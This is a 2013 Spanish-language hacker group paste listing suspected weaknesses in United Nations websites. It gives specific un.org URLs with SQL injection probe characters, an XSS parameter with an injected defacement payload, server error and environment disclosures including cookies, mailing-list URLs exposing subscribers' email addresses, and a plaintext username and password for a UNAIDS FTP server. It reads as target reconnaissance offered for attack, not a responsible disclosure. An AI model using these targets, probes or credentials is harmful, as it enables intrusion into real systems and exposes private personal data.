un.org #Reports #SQl_InjectionPosibility #Otrs by yei zeta

1. ###########################################################################################
2. # : : o : #
3. # _..-: 0 : :-.._ / #title:un.org #Reports #SQl_InjectionPosibility #Otrs by yei zeta
4. # .-'' ' `---' `---' " ``-. #*The Ciber War In 2013
5. # .' " ' " . " . ' " `. #*Informaticos
6. # : '.---.,,.,...,.,.,.,..---. ' ; #*2013-2018
7. # `. " `. .' " .' #*Grupo: The Joker Hack
8. # `. '`. .-/|||||||\-. .' ' .' #*Red Social:https://www.facebook.com/TheJokerTeamHack
9. # `. `-._ \|||/ _.-' " .' #
10. # `. " '"--...--"' . ' .' #Created by: Yei zeta
11. # .'`-._' " . " _.-'`. #
12. # .' ```--.....--''' ' `: #Info: the joker hack se hace responsable de la información
13. #########################################################################################
14.  
15. target:unstats.un.org
16.  
17. pagina principal:http://www.un.org/en/unpress/highlights.asp
18.  
19.  
20.  
21. ---------------------------------------------
22. Detalles:
23. ---------------------------------------------
24. Posible SQL:
25.  
26. http://unstats.un.org/unsd/cr/registry/regcst.asp?Cl=1´´
27.  
28. XSS:
29.  
30. http://www.un.org/Docs/journal/asp/ws.asp?m=
31.  
32. diseño SS:<h1>visita</h1><p>Thejokerhack.com</p>
33. ---------------------------------------------
34.  
35. Error Asp.net:
36.  
37. http://www.escwa.un.org/information/
38.  
39. Active Server Pages error 'ASP 0126'
40.  
41. Include file not found
42.  
43. /information/index.asp, line 217
44.  
45. The include file 'header.asp' was not found.
46.  
47. Posible SQl_Injection:
48.  
49. http://www.escwa.un.org/divisions/ecri.asp?division=ecri%C2%B4%C2%B4
50. http://www.escwa.un.org/information/pubaction.asp?PubID=1057%C2%B4%C2%B4
51. ---------------------------------------------
52.  
53. Tesis:
54.  
55. PHP_VERSION 5.3.3
56. HTTP_HOST www.pacific.one.un.org
57. HTTP_CONNECTION close
58. HTTP_ACCEPT text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
59. HTTP_USER_AGENT Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36
60. HTTP_REFERER http://www.pacific.one.un.org/test/php/test.html
61. HTTP_ACCEPT_ENCODING gzip,deflate,sdch
62. HTTP_ACCEPT_LANGUAGE es-ES,es;q=0.8
63. HTTP_COOKIE __utma=114554307.364164019.1377711549.1377711549.1377711549.1; __utmb=114554307.3.10.1377711549; __utmc=114554307; __utmz=114554307.1377711549.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __unam=6e7be7d-140c601baac-1d64498-4; 5e9cb9e6c763acd861e139367cb9873b=-
64. REQUEST_METHOD GET
65. REQUEST_URI /test/php/test.php?1377712164467
66. REQUEST_TIME 1377712158
67.  
68. Error programation:
69.  
70. http://sustainabledevelopment.un.org/index.php?page=view&type=1006&menu=809&nr=492
71.  
72. ---------------------------------------------
73.  
74. Posible edit page:
75.  
76. http://unstats.un.org/unsd/tradekb/ExportPDF50116.aspx
77.  
78. Save Users in URL
79.  
80. https://list.un.org/mailman/options/webcast/avatarabo1.risk@blogger.com
81. https://list.un.org/mailman/options/news17/zideajanur2.news@blogger.com
82. https://list.un.org/mailman/options/news17/touchwoodim.tool@blogger.com
83. https://list.un.org/mailman/options/news10/balinputra@yahoo.com
84. https://list.un.org/mailman/options/news2/balinputra@yahoo.com
85. ---------------------------------------------
86. Users save in page:
87.  
88. http://cmm-ftp.unaids.org/
89.  
90. ID:unaids_public_nyc
91. password:nyc_june_Un@idS
92. info contac:https://twitter.com/UNAIDS